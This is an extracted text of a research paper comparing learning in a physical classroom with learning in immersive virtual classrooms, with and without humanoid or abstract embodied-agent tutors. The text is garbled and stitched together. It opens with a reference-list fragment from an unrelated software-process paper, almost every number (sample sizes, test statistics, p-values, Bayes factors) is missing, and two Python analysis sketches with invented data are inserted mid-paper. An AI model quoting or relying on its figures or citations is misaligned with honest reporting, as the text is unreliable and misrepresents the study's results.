. /a: . el-emam k, goldenson dr. . an empirical review of software process assessments. advances in computers : – doi . /s - ( ) -x. hall t, rainer a, baddoo n. . implementing software process improvement: an empirical study. software process: improvement and practice ( ): – doi . /spip. . kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /a: http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . /spip. http://dx.doi.org/ . /spip. http://dx.doi.org/ . /peerj-cs. hannay je, benestad hc. . perceived productivity threats in large agile development projects. in: proceedings of the international symposium on empirical software engineering and measurement. new york: acm, : – : . helgesson yyl, höst m, weyns k. . a review of methods for evaluation of maturity models for process improvement. journal of software: evolution and process ( ): – doi . /smr. . horvat rv, rozman i, györkös j. . managing the complexity of spi in small compa- nies. software process: improvement and practice ( ): – doi . /(sici) - ( ) : < ::aid-spip > . .co; - . hull m, taylor p, hanna j, millar r. . software development processes—an assess- ment. information and software technology ( ): – doi . /s - ( ) - . humphrey ws. . 
immersive virtual environments and embodied agents for e-learning applications
isabel s. fitton, daniel j. finnegan and michael j. proulx
department of computer science, university of bath, bath, uk
school of computer science & informatics, cardiff university, cardiff, uk
department of psychology, university of bath, bath, uk
abstract
massive open online courses are a dominant force in remote-learning yet suffer from persisting problems stemming from lack of commitment and low completion rates. in this initial study we investigate how the use of immersive virtual environments for power-point based informational learning may benefit learners and mimic traditional lectures successfully. we examine the role of embodied agent tutors which are frequently implemented within virtual learning environments. we find similar performance on a bespoke knowledge test and metrics for motivation, satisfaction, and engagement by learners in both real and virtual environments, regardless of embodied agent tutor presence. our results raise questions regarding the viability of using virtual environments for remote-learning paradigms, and we emphasise the need for further investigation to inform the design of effective remote-learning applications.
subjects human-computer interaction, computer education
keywords virtual reality, distance learning, mooc, classroom, immersive virtual environments, e-learning, education
introduction
technological advancements have played a vital role in accommodating vast numbers of students through the growth of distance learning applications and e-learning platforms (kaplan & haenlein, ; kauffman, ). the predominant form of distance learning applications are massive open online courses (moocs). moocs offer access to teaching and material on a large scale via internet-based virtual learning environments for a limitless number of participants, making education more accessible (freitas & paredes, ). modern moocs involve a video captured recording of a human lecturer who delivers the learning content, facilitating the completion of homework or exams, and discussion via forums (feng et al., ). however, despite the potential of moocs to deliver teaching materials and content at a global scale, existing platforms suffer from issues with drop-out and learner motivation (yang et al., ). in parallel to e-learning platforms gaining popularity (sneddon et al., ), vr technology has increasingly been adopted in the classroom as a teaching aid for 'hands-on' skills-based teaching partly due to reductions in cost. for example in medicine, digital models are much cheaper compared to physical anatomical models for training students (rajeswaran et al., ). using digital models in a virtual reality scenario is a cost-effective way to educate students
how to cite this article fitton is, finnegan dj, proulx mj. .
immersive virtual environments and embodied agents for e-learning applications. peerj comput. sci. :e doi . /peerj-cs. submitted april accepted october published november corresponding author isabel s. fitton, isf @bath.ac.uk academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright fitton et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:isf @�bath.�ac.�uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ on a large scale and as a result there is growing excitement regarding the potential of vr to revolutionise education and e-learning (greenwald et al., ). while vr is regarded as beneficial to students as a practical teaching aid, its application to formal, lecture style teaching—which e-learning platforms tend to deliver—is less common (korallo, ). the use of immersive virtual environments (ives) for corporate and higher-education purposes have only recently begun to emerge. due to such applications being in their infancy there is very little empirical evaluation of their efficacy or research available to inform their design. a key component of many ives is the presence of an embodied agent (ea) which, in the context of learning, may serve as a virtual guide or tutor. the use of eas as virtual tutors within educational ives is critical for effective pedagogy (soliman & guetl, ). previous research suggests that the representation of artificial agents affects learners’ motivation (maldonado & nass, ). for example an ea may be customised by the learner to suit their preference—such customisation has been shown to improve performance for some cognitive tasks (lin et al., ). in another study that tested male vs. female pedagogical agents, the female seemed to be preferred overall (novick et al., ). a recent systematic review of pedagogical agents noted that positive results have been found in numerous studies, yet different combinations of features and different outcome variables have not been systematically studied to clarify which features work best or when (martha & santoso, ). however, it is unclear how the presence of an ea and learner motivation interact. a clear and robust analysis of these factors and their impact on the learning experience is critical for future application of ives as engaging platforms for distance learning. furthermore, the recent novel sars-cov- (covid- ) pandemic has had huge repercussions for higher education across the world. as millions of people were restricted to not leaving their homes for extended periods of time, many institutions also shifted to remote delivery of learning material for the academic year / . although this presents challenges around blended learning and flipped classroom design, our focus remains on technology and how it may act as a medium for learning material delivery as opposed to what content such material should contain. our main contribution in this work is an empirical investigation into factors which impact the overall student experience when learning in ives. specifically we report how the presence of an embodied teacher and students’ sense of presence in the environment impact learning retention, satisfaction and engagement, and student motivation to engage with learning material presented in an ive. 
our results demonstrate how learning in ives is comparable to real classroom learning, yet can scale far beyond the limits of traditional classrooms with constraints such as staff-student ratio and classroom size. finally, we emphasise implications for future work in designing and assessing ives for remote learning purposes. background as distance learning continues to expand, catering for larger numbers of students across the globe, current solutions provide inefficient delivery systems which are not immersive, engaging, or motivating to the learner—often resulting in poor rates of completion fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (wise et al., ; yang et al., ; chen, ). for example an investigation into the use of ‘accountable talk: conversation that works’, a mooc provided by the university of pittsburgh, revealed that despite in excess of , students registering for the programme less than half continued to access the course material through to completion (rosé et al., ). attrition rates of learners in moocs is much higher than that in formal education (clow, ; joo, so & kim, ). users also report that they do not perceive moocs as equivalent to traditional education, and their engagement with them is less serious (nemer & o’neill, ). as a result, moocs are unable to deliver educational experiences with the same rigour as formal educational institutions. while moocs have several short-comings, the ability to study without being physically located in a certain space has many advantages to both students unable to attend and universities who are coping with growing numbers of students. therefore, finding ways to improve the experience of distance learning and encouraging greater levels of engagement with online courses is of great public interest and their efficacy in education is of equal pedagogic interest. bringing learners into ives may overcome engagement issues experienced in moocs. students prefer to engage in traditional lectures over online courses because they lack self-discipline and they can become too easily distracted during online learning (crook & schofield, ). applying immersive vr to education may engage students better than moocs, removing distractions outside of the learning environment, mimicking the experience of traditional learning experiences (lessick & kraft, ; pirker et al., ). existing examples of educational applications of vr have focused on non immersive desktop-vr and have shown that simulating learning environments is highly effective. for example desktop-vr has been successfully used for social cognition training in children with autism spectrum disorders and for assessing procedural skills such as dissecting frogs in a laboratory study (didehbani et al., ; merchant et al., ). ive based learning environments have shown that learning using vr results in better retention and improves learners’ performance by up to a grade compared to simply watching a lecture or reading (sitzmann, ; graesser et al., ). while educational applications of desktop-vr have merit, research suggests ives lead to better results as interaction with the environment is more intuitive, therefore users spend less time learning how to use the computer interface and can focus their full attention on the task (psotka, ). to date, ives have been predominantly applied to procedural and skills-based education, successfully enhancing learning outcomes. 
for example the performance of a group of material science students on a series of questions about crystal structures improved when they were presented with virtual d diagrams of crystal structures via a head-mounted display (hmd), compared to using d diagrams (caro et al., ). the ability to manipulate and rotate the crystals in the ive helped students understand the relationships between atoms and perform better in assessment tasks than those who studied the textbook diagrams. additionally, students reported that the ive was easy to use and preferable over the d format. ives are also commonly used successfully to train complex psychomotor skills required by medical students. for example airwayvr provides a safe, immersive environment to practice fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ endotracheal intubation procedures, leading to clear improvements in students’ self-reported understanding of the procedure compared to their knowledge prior to using the application (rajeswaran et al., ). recent research suggests applying ives to lecture-styled learning may provide distance learners with enriched learning experiences that are more immersive, enjoyable, and realistic (chen, ). preliminary research has shown the value in using ives to replicate classroom learning, finding that students perform better on a quiz about the topic after watching a virtual lecture compared to watching a video recording of a lecture, as is typically done in moocs (tsaramirsis et al., ). additionally, all learners reported that they preferred the ive as it was more enjoyable, reinforcing the idea that ives are likely to successfully engage a larger number of distance learners than mooc platforms. however, while educational applications of ives for distance learning in both higher education and corporate level training have begun to emerge, these applications are in their infancy. recent work has explored the use of modern game development engines and hmd based environments for creating virtual lecture theatres and classrooms (misbhauddin, ), but has not explored how effective these environments are at improving learner performance, motivation, and satisfaction & engagement. as such, to the best of our knowledge there are currently no published findings regarding their effectiveness, resulting in very little robust evidence to inform how the design of an ive impacts learning outcomes (moro, stromberga & stirling, ). when designing ives, one does not consider just the aesthetic, but also the presence of other agents inside the environment. within ives, embodied agents (eas) are frequently used as pedagogical agents for virtual tutoring. for example steve is a human-like ea used to teach engineers how to use complex machinery onboard ships (johnson & rickel, ). in addition to humanoid eas there are non-human examples such as herman the bug—a non-humanoid ea implemented in design-a-plant, a virtual environment used to teach children about plant biology and the environment (lester, stone & stelling, ). the appearance and behaviour of ea tutors influences learners’ feelings of co-presence (baylor, ; baylor & kim, )—the perception that one is not alone but in the presence of others (heeter, ; short, williams & christie, ). 
co-presence increases when an ea tutor has appearance and behavioural realism—a key point being that there is no mismatch between appearance and behavioural realism, as this results in very low levels of perceived co-presence (bailenson et al., ). increasing a learner’s perceived co-presence increases learner satisfaction and motivation to engage with material. for example it has been shown that learners spend approximately % more time learning and report that the learning experience is more enjoyable when an ea is present (sträfling et al., ). a limitation of current distance learning platforms, such as moocs, is that learners must try to maintain enthusiasm and motivation to complete the course in the absence of an educator (hasegawa, uğurlu & sakuta, ). implementing an appropriate ea which represents a lecturer within an ive may maintain learner interest and motivation, positively impacting learning outcomes. the appearance of the virtual tutor impacts a learner’s perception fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of the tutor’s abilities. for example human-like agents are perceived as more intelligent and helpful compared to non-human agents (king & ohya, ; lester & stone, ), while familiar agents are rated more positively than unfamiliar agents (bailenson et al., ). previous research has demonstrated that virtual tutor realism influences learners’ reported likability and motivation (maldonado & nass, ), in turn influencing performance. thus, we expect that a realistic ea tutor which is familiar to the learner will be more likeable, improving the learning experience and motivation to learn (maldonado & nass, ; scaife & rogers, ). while some evidence suggests that eas play a substantial role in the learning experience, increasing learning efficiency and retention (roussou, oliver & slater, ), others have found minimal-to-no effect of eas on learning outcomes. for example in one study eas were found to have no influence and prior knowledge was identified as the greatest contributing factor to learner performance (sträfling et al., ). therefore, to clearly establish the utility of eas within ives researchers should aim to control this potentially extraneous variable to prevent participants’ prior knowledge of the topic concealing any effects of the ea. overall, ives for educational purposes have the potential to mimic traditional learning experiences greater than moocs. by utilising ives to develop more engaging distance learning experiences, universities and corporate training bodies may cater for increasing student numbers. however, a major barrier to implementing ives compared to moocs is the higher relative cost of the equipment required. therefore, it is essential that interdisciplinary research is conducted to establish whether ives, which can be run on low powered hardware such as smartphones, are able to provide a method of engaging more students, provide remote-learners with an experience which is more equivalent to formal education, and make a worthwhile contribution to higher education institutions looking to provide effective distance learning. user study our study focuses on the educational applications of ives, specifically investigating the effectiveness of learning novel information in an ive compared to a physical classroom, and the role of eas as tutors within the ives. 
we devised the following hypotheses: h : participants who learn inside an ive will learn more effectively and outperform participants who learn in a physical classroom since prior research has shown that virtual learning environments result in better retention and improves performance (sitzmann, ; graesser et al., ). h : participants who learn in the presence of an ea tutor will outperform participants who learn without one because the presence of a virtual tutor influences motivation which may in turn influence performance (sträfling et al., ). h : the presence of a humanoid ea tutor will be more likable and increase motivation in learners compared to an abstract ea tutor because more familiar and realistic tutors are more likeable and motivating (bailenson et al., ; maldonado & nass, ). fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ materials and methods a between-participant design was used, whereby participants were randomly assigned to one of the four learning conditions. the independent variable was the learning environment (ive with no tutor, ive with a humanoid tutor, ive with an abstract tutor, non-virtual learning environment). the dependent variables were performance (test score), and reported motivation, satisfaction, and engagement (questionnaire). the experiment lasted approximately ∼ min. design and apparatus opportunity sampling was used to recruit participants from a local university. the target sample size for this initial study was participants, split equally between the four learning conditions, based on the results of an a-priori power analysis, conducted using g*power (faul et al., ), revealing a one-way anova with participants per group would provide % power to detect an effect size of . at a significance level of . . note that we instead used a more conservative kruskal–wallis test rather than the anova to evaluate the results; prior work has shown that kruskal–wallis has greater statistical power than anova under these conditions, so the analyses presented were indeed sufficiently powered (hecke, ). in total, participants were recruited ( m, f), aged and over (m = . years, sd = . years). all participants were students from a variety of disciplines who reported normal or corrected to normal vision and hearing. participants were incentivized through course credit (n = ), £ reward (n = ), or simply volunteered to participate (n = ). statistical tests confirmed that there was no significant effect of the type of incentive received on participant performance (see supplemental material). a machine running windows with a single nvidia gpu was adequate to drive the virtual environment since it is without cutting-edge graphics. to display the virtual environment, we used the htc vive hmd. this hmd covers a degrees field of view, with two , × , pixel screens to render stereoscopic graphics to the viewer. head position and orientation were tracked using the hardware base stations packaged with the hmd. however, the environment can also be demoed as a mobile application and we expect that in a larger cohort the set up could be easily scaled up using more consumer-friendly devices such as smartphones and google cardboards. learning environments & material a seminar room on a local university campus was used as the non-virtual learning environment (see fig. ). 
a powerpoint presentation was projected onto the screen to display the learning material and the female experimenter represented the tutor, reading a script alongside each slide (see supplemental materials). a virtual replica of the physical classroom, made to scale in order to minimise the number of extraneous variables (fig. c) was created using unity . . . to replicate the appearance, colours and textures were applied and generic classroom furniture were used to decorate the virtual environment. to display the powerpoint slides in the ives, custom software applied images of the powerpoint slides as textures to the virtual projector fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ screen. the lecture slide changed to the next one in sequence when spacebar was pressed. audio recordings of the female experimenter reading the script were automatically played with each slide to keep delivery of the lecture material consistent for all participants. for the ive with a humanoid tutor, a female avatar was created using adobefuse cc beta and imported into the environment (fig. a). the female avatar has an animator controller to loop an ‘idle’ and an ‘eye blink’ motion to appear more realistic. for the ive with an abstract tutor, a block-shape representation was created from geometrically primitive shapes (fig. b). the abstract tutor was animated using key frame animation which moved the body side-to-side and rotated the eyes to replicate the humanoid ‘idle’ and ‘blink’ motions. novel information was created for this study about the developmental stages of a made-up alien species. this was used as the learning material in order to eliminate the possibility of prior knowledge becoming a confounding variable (see supplemental material). questionnaire all data were recorded using qualtrics, a web browser interface that automatically recorded responses from participants. the first section of the questionnaire contained the knowledge test, composed of questions designed to test participants’ knowledge of the alien species. the majority of the questions were multiple choice in order to test retention, with some short answer questions to test comprehension (schrader & bastiaens, ) (see supplemental material). however, multiple choice tests have been critiqued as they ‘feed’ students the answers, making it possible to gain artificially high scores (bush, ). therefore to accurately reflect retention, the test was negatively marked (meaning correct answers were given a score of , incorrect answers scored − , and any figure the humanoid embodied agent tutor (a), the non-human tutor (b), a view of the entire virtual classroom environment (c), a view from the perspective of participants in our experiment showing the novel learning material (d), and a view of the real world classroom (e). participants sat in the same position in both real and virtual environments as shown by the red circles. full-size doi: . /peerj-cs. /fig- fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ unanswered questions scored ) to discourage guessing (davies, ). 
the test was marked to produce a score to indicate participant performance. three blocks of questions followed: learner satisfaction and engagement ( items); learner motivation ( items); and virtual presence ( items; see supplemental materials for the questionnaire). learner satisfaction and engagement the questions designed to measure satisfaction and engagement with the learning experience were -point likert scales which asked participants how strongly they agreed or disagreed with the statements. for example “the learning experience captured my interest”. each item was scored out of five ( = strongly agree) and added together to produce a learner satisfaction and engagement score out of . the questions were created for the purpose of this experiment as it aimed to measure specifically how engaged ‘students’ were in this one experience. we had considered using an existing student satisfaction questionnaire but opted to develop our own so that questions could be focused on the experience in our study. learner motivation another block of questions was specifically tailored to investigate the effects of the ea tutor manipulation on learner motivation, for example “the presence of the tutor increased my motivation to learn”. each item included a -point likert scale which asked participants to what extent they agreed with each statement, with ‘strongly agree’ being scored as five. the item scores were added together to produce a learner motivation score out of . virtual presence the virtual presence questions were taken from an existing questionnaire (witmer & singer, ). the most applicable items were selected, for example “to what degree did your experiences in the virtual environment seem consistent with your real-world experiences?”, participants responded to each statement via a -point scale ( = not at all, = completely) to indicate how immersive the ives were, and this produced a virtual presence score out of . finally, to measure any potentially confounding effects, participants in the ive with a humanoid tutor were asked to report anything they found ‘odd’ about the human avatar, as a perceived mismatch between appearance and expected behaviour, for example ‘speaking’ with no changing facial expression or lip movement, could lead to disliking of the tutor and affect performance (mori, ; bailenson et al., ). procedure this study was approved by the university of bath psychology research ethics committee ( - ). participants were provided with further information about the study before giving written informed consent. only one participant took part in the experiment at a time. each participant was randomly allocated to one of the four learning conditions. participants in the ives were seated at a computer in the laboratory, the experimenter would assist with fitting the headset and headphones to ensure the participant was fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ comfortable. the experimenter would then launch the appropriate classroom application (i.e. with a humanoid/abstract/no tutor). participants allocated to the non-virtual condition were seated in a seminar room on the university campus. participants in the non-virtual condition took part in the experiment individually: the only other person present in the room was the experimenter. 
in both virtual and non-virtual conditions participants were shown the same powerpoint presentation, and heard the same experimenter deliver the scripted information. the only difference being that in the virtual condition the voice-clips were pre-recorded and incorporated into the environment, whereas in the non-virtual condition the experimenter delivered the information in person. in all conditions, participants observed the full presentation with corresponding audio once, and were then allowed the remaining time to read through the slides themselves with no audio input. after -minutes the experimenter halted the learning part of the experiment, and those in the ives would be asked to remove the headset. all participants were then required to complete the online test and questionnaire. throughout the experiment, all participants remained naïve to the manipulation of the tutor and the environment. afterwards all participants were fully debriefed, and the full aims of the study were revealed, participants then provided final consent for the data to be used. analysis and results frequentist null hypothesis significance testing and the associated p-value has many shortcomings, for example it relies on hypothetical data and can be easily manipulated— with larger sample sizes able to make small differences significant without any practical value (jarosz & wiley, ; dienes, ). bayes factor (bf) is a ratio which indicates the likelihood of the observed data fitting under either of the two hypotheses. therefore, bayesian statistics were conducted using jasp version . to determine the relative strength of the support for the null vs. alternative hypotheses. bf represents the likelihood that the evidence is explained by one hypothesis over another, for example a bf of would indicate that one hypothesis is times more likely to explain the data. bf can be given as bf (evidence for the alternative hypothesis) or bf (evidence for the null hypothesis) (schut et al., ). we used bf values as they are easier to interpret in relation to our findings. based on this interpretation scheme, bf values of – indicate moderate support for the null hypothesis, while values < indicate weak support for the null hypothesis (wagenmakers et al., ). tables and presents a summary of these results. additional statistical analyses carried out using spss version . were evaluated against an alpha level of . . an independent t-test was used to determine differences in learner motivation between the humanoid tutor ive and the abstract tutor ive. assumption checking revealed that the data were normally distributed as assessed by the shapiro–wilk test (p > . ), and the variance in each group was approximately equal, as assessed by levene’s test for homogeneity of variances (p > . ). however, due to the small sample size three kruskal–wallis tests were conducted to compare learner performance, satisfaction and engagement, and virtual presence ratings across multiple fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ learning conditions. preliminary analyses confirmed that the data met the test assumptions as there were no extreme outliers, and there was homogeneity of variances. learner performance mean scores for learner performance in each learning conditions are shown in fig. . on average, learner performance was similar across all learning environments, with only table t-test results for the impact of tutor on motivation to learn. 
abstract tutor humanoid tutor measure m sd m sd t( ) p d motivation . . . − . . − . figure mean test scores in the different learning environments. error bars represent the standard error (se). dots show distribution of participant scores, with larger dots indicating multiple participants with the same score. full-size doi: . /peerj-cs. /fig- table kruskal–wallis results summary covering the three core variables in our study: learner performance, satisfaction & engagement, and sense of presence. non-virtual virtual, no tutor virtual, humanoid tutor virtual, abstract tutor h( ) p η measure m sd m sd m sd m sd performance . . . . . . . . . . . no tutor humanoid tutor abstract tutor h( ) p η m sd m sd m sd satisfaction & engagement . . . . . . . . . presence . . . . . . . . . fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ slight differences among conditions. with respect to h and h , we conducted a kruskal– wallis test and results report no statistically significant differences in performance scores between conditions, h( ) = . , p = . , η = . , this result is moderately reinforced by the bayes statistics which indicate that the data are six times more likely to be explained by the null hypothesis (bf = . ). learner satisfaction and engagement mean scores for learner satisfaction and engagement in each virtual learning condition are shown in fig. . learner satisfaction and engagement levels, as measured by seven items in the questionnaire (cronbach a = . ), were similar across all virtual learning conditions, with only slightly higher levels measured in the ive with no tutor. a kruskal–wallis test supported that learner satisfaction and engagement levels were not significantly different between the virtual learning conditions, h( ) = . , p = . , η = . furthermore, bayes statistics indicate that the data are four times more likely to be explained by the null hypothesis (bf = . ). learner motivation mean scores for learner motivation in the presence of humanoid and non-humanoid eas are shown in fig. . learner motivation scores, measured using three items in the questionnaire (cronbach a = . ), appeared higher in the ive with the abstract tutor (m = . , sd = . ) compared to learner motivation scores in the ive with the humanoid tutor (m = . , sd = . ). with respect to h , an independent samples t-test revealed that these differences in learner motivation between conditions were not significantly different, t( ) = − . , p = . , d = − . . however, bayes statistics only indicate very figure mean satisfaction and engagement scores with error bars representing se, for the predictor of learning condition within immersive virtual environments (no tutor, humanoid tutor, abstract tutor). the real environment was not modelled as a condition in this analysis and therefore means for three conditions are shown. error bars and dots as in fig. . full-size doi: . /peerj-cs. /fig- fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ weak support for the null hypothesis in this case as it suggests that the null hypothesis is only one times more likely to explain the data (bf = . ). virtual presence virtual presence was measured using only a subset of witmer and singer’s presence questionnaire so measures of internal reliability were not conducted. 
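the measurement steps reported above (negative marking of the knowledge test, summing each likert block into a subscale total, and cronbach's alpha for internal consistency) follow a simple recipe. the sketch below is a hypothetical python illustration with invented responses; it is not the study's actual scoring pipeline, and the item data and answer key are made up for the example.

```python
# Hypothetical sketch of the scoring and reliability steps described above:
# negative marking of the knowledge test (+1 correct, -1 incorrect, 0 blank),
# summing Likert items into a subscale total, and Cronbach's alpha for a block
# of items. All data below are invented for illustration.
import numpy as np

def knowledge_score(answers, key):
    """Negatively marked test: +1 for a correct answer, -1 for incorrect, 0 if unanswered (None)."""
    score = 0
    for given, correct in zip(answers, key):
        if given is None:
            continue
        score += 1 if given == correct else -1
    return score

def cronbach_alpha(items):
    """items: 2-D array, rows = participants, columns = Likert items (e.g. scored 1-5)."""
    items = np.asarray(items, dtype=float)
    k = items.shape[1]
    item_variances = items.var(axis=0, ddof=1)
    total_variance = items.sum(axis=1).var(ddof=1)
    return (k / (k - 1)) * (1 - item_variances.sum() / total_variance)

# Invented data: five participants answering a seven-item satisfaction block (1-5 Likert).
satisfaction_items = np.array([
    [4, 5, 4, 3, 4, 5, 4],
    [3, 3, 4, 2, 3, 3, 4],
    [5, 5, 5, 4, 5, 4, 5],
    [2, 3, 2, 2, 3, 2, 3],
    [4, 4, 3, 4, 4, 4, 4],
])
satisfaction_totals = satisfaction_items.sum(axis=1)    # one satisfaction & engagement score per learner

answer_key = ["b", "d", "a"]                            # hypothetical 3-item answer key
print(knowledge_score(["b", None, "c"], answer_key))    # 1 + 0 - 1 = 0
print("cronbach's alpha:", round(cronbach_alpha(satisfaction_items), 2))
print("subscale totals:", satisfaction_totals)
```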
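similarly, the kruskal–wallis comparisons, eta-squared effect sizes, and bayes factors reported in this section can be approximated with standard tools. the sketch below uses scipy and statsmodels on invented condition scores; the study itself used spss and jasp, and the bic-based bf approximation at the end is only a rough stand-in for jasp's bayesian tests, not the procedure actually used.

```python
# Sketch of a Kruskal-Wallis comparison with an eta-squared effect size, plus a
# rough BIC-based approximation of BF01, on invented scores for the four
# learning conditions. Not the study's actual analysis.
import numpy as np
import pandas as pd
import statsmodels.formula.api as smf
from scipy.stats import kruskal

non_virtual   = [12, 9, 14, 11, 10, 13]   # invented knowledge-test scores
ive_no_tutor  = [11, 13, 10, 12, 9, 14]
ive_humanoid  = [10, 12, 11, 9, 13, 12]
ive_abstract  = [13, 10, 12, 11, 14, 9]
groups = [non_virtual, ive_no_tutor, ive_humanoid, ive_abstract]

h_stat, p_value = kruskal(*groups)
n = sum(len(g) for g in groups)
k = len(groups)
eta_squared = (h_stat - k + 1) / (n - k)   # one common eta-squared estimate for the H statistic
print(f"H({k - 1}) = {h_stat:.2f}, p = {p_value:.3f}, eta^2 = {eta_squared:.3f}")

# Rough BF01 via a BIC approximation: compare an intercept-only model with a
# model that includes condition. JASP's default priors will generally give
# somewhat different values, so treat this only as an order-of-magnitude check.
df = pd.DataFrame({
    "score": np.concatenate(groups),
    "condition": np.repeat(["real", "no_tutor", "humanoid", "abstract"],
                           [len(g) for g in groups]),
})
bic_null = smf.ols("score ~ 1", data=df).fit().bic
bic_alt  = smf.ols("score ~ C(condition)", data=df).fit().bic
bf01 = np.exp((bic_alt - bic_null) / 2)
print(f"approximate BF01 = {bf01:.1f}")
```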
learner ratings of virtual presence were consistent across the different ives (no tutor m = . , sd = . ; human tutor m = . , sd = . ; abstract tutor m = . , sd = . ). a kruskal–wallis test supported that virtual presence scores were not significantly different between the virtual reality learning conditions, h( ) = . , p = . , η = . , furthermore bayes statistics provide moderate support for the null (bf = ). learner perceptions of avatar in response to the question “did you notice anything odd about the human avatar?” % of the participants in the ive with the humanoid tutor reported that they did find the humanoid ea tutor strange. the reasons for answering ‘yes’ to the question were that the avatar had strange or repetitive movement, no changing facial expressions, and did not speak. discussion previous research and educational applications of vr have focused on desktop-vr simulations for skills-based tasks (freina & ott, ), neglecting the use of more ives and their potential use for informational, lecture-styled learning experiences. therefore, in this pilot study we investigated to what extent informational-learning within an ive is effective compared to learning in a physical classroom. we created a virtual replica of a figure results of a t-test conducted to analyse the impact of humanoid vs. abstract tutor representation on learner motivation scores, and therefore means for two conditions are shown. error bars and dots as in fig. . full-size doi: . /peerj-cs. /fig- fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ classroom and compared its use for informational learning to the traditional, real-world classroom. previous literature indicated that simulated learning environments are highly effective, enhance declarative knowledge, and lead to better retention compared to conventional learning methods (graesser et al., ; merchant et al., ; sitzmann, ). while desktop-vr has dominated the literature, it is argued that more immersive experiences may lead to even greater results (psotka, ). therefore, we hypothesised that participants who learned virtually would outperform participants who learned non-virtually (h ). however, results demonstrated that participants who learned virtually did not outperform participants who learned non-virtually. a bf analysis provides moderate support for this finding as it suggests that the data are six times more likely to be explained by the null hypothesis. it is plausible that familiarity with learning material, which is known to impact learner engagement, performance, and motivation (schönwetter, clifton & perry, ), would have impacted our results: to combat this effect we used fabricated information to eliminate prior knowledge as a confounding variable. thus our findings are robust, indicating there is no detriment to learning in an ive compared to a conventional classroom setting (madden et al., ). the lack of a statistically significant difference in learner performance between the ive and the non-virtual classroom is of particular importance as educational institutions are under increasing pressure to cater for large numbers of students, and as such require effective distance learning applications (kauffman, ). current distance learning platforms suffer from poor student engagement and high levels of drop-out (yang et al., ), however, ives have the potential to improve this. 
previous research has demonstrated that ives provide a more engaging platform for distance learners than existing video-based applications (tsaramirsis et al., ). in light of the covid- pandemic and its impact on the higher education sector, namely creating situations where many institutions have closed their campus until further notice, ives may yield a better experience for distance learners. furthermore, our research supports that distance learning applications would benefit from incorporating the use of ives, as distance-learner performance would be consistent with learners in traditional settings, yet ives can be used on a much larger scale, making them highly cost-efficient. the role of embodied agents few studies have been conducted which inform how the design and use of ea tutors impacts the learner experience (moro, stromberga & stirling, ), so we investigated the role of ea tutors within ives. we manipulated the tutor in the ive on two dimensions; its presence or absence, and its human-like representation. previous research has suggested that co-presence influences the learning experience, with higher feelings of co-presence resulting in greater learning performance (roussou, oliver & slater, ; wise et al., ). therefore, we hypothesised that participants who learn in the presence of an ea tutor will outperform participants who learn in its absence. we found no statistically significant difference in performance of learners who learned without a virtual tutor, with a humanoid tutor, or with an abstract tutor. participants who fitton et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ learned in the ive without an ea tutor were expected to perform worse on the post-learning test. our findings fit into current discourse and debate on the utility of eas and their impact on learning: while some research has concluded no impact on performance, consistent with ours (sträfling et al., ), other research has found that eas do impact learning performance (baylor amy, ; maldonado & nass, ; rosenberg-kima et al., ). one explanation for our results is the age of participants in our study. previous research in agreement with our results used young adults (sträfling et al., ), while others have recruited young school children (roussou, oliver & slater, ). the presence of virtual avatars is known to positively impact learning in young children (darves, oviatt & coulston, ) and it is possible that the positive impact of ea tutors on learner performance may be confined to when ives are used by younger students (baylor & kim, ; ashby plant et al., ). embodied agent tutors impact learner satisfaction and engagement within ives by simulating the relationship between student and tutor (alseid & rigas, ). a learner’s social judgement of interactions with an ea impacts perceived co-presence and satisfaction, with human-like representations regarded as more social than non-human avatars (nowak, ). therefore, we hypothesised that a humanoid ea tutor would be preferred over an abstract ea. however, our results show no statistically significant differences in learner satisfaction and engagement when comparing the ive with no tutor, the humanoid tutor, or the abstract tutor. bf analysis indicates that the data were four times more likely to be explained by the null hypothesis in this instance and therefore can be accepted with moderate confidence (wagenmakers et al., ). 
